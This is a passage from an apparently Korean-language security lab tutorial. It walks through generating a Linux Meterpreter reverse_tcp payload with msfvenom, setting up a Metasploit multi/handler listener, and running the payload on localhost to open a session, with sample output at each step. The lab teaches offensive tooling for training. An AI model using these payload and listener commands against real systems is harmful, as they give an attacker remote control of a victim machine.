대상 시스템에서 Meterpreter 세션 획득하기
이 단계에서는 시스템 클린업을 연습하기 전에 먼저 시스템에 접근해야 합니다. msfvenom으로 페이로드를 생성하고, Metasploit Framework 에서 리스너를 설정한 다음, 자체 머신에서 페이로드를 "실행"하여 localhost에서 Meterpreter 세션을 얻는 방식으로 이를 시뮬레이션할 것입니다.
먼저 터미널을 열고 msfvenom을 사용하여 Linux Meterpreter 페이로드를 생성합니다. 이 명령은 현재 디렉토리 (~/project) 에 payload.elf라는 실행 파일을 생성합니다.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
페이로드가 성공적으로 생성되었음을 나타내는 출력이 표시되어야 합니다.
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
다음으로 Metasploit Framework 콘솔을 시작합니다. -q 플래그는 배너를 표시하지 않고 조용하게 시작하도록 합니다.
msfconsole -q
msfconsole 프롬프트에 들어가면 페이로드로부터의 연결을 수신할 리스너를 구성해야 합니다. exploit/multi/handler 모듈을 사용할 것입니다.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
exploit -j 명령은 리스너를 백그라운드 작업으로 시작하므로 콘솔을 계속 사용할 수 있습니다. 핸들러가 시작되었다는 메시지가 표시됩니다.
이제 터미널 창의 + 아이콘을 클릭하여 새 터미널 탭을 엽니다. 이 새 탭에서 페이로드를 실행 가능하게 만들고 실행합니다.
chmod +x ~/project/payload.elf
~/project/payload.elf
msfconsole이 있는 첫 번째 터미널 탭으로 돌아갑니다. Meterpreter 세션이 열렸음을 나타내는 메시지가 표시되어야 합니다.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
이 새 세션과 상호 작용하려면 sessions 명령을 사용합니다.
sessions -i 1
프롬프트가 meterpreter >로 변경되어 세션을 제어하고 있음을 나타냅니다.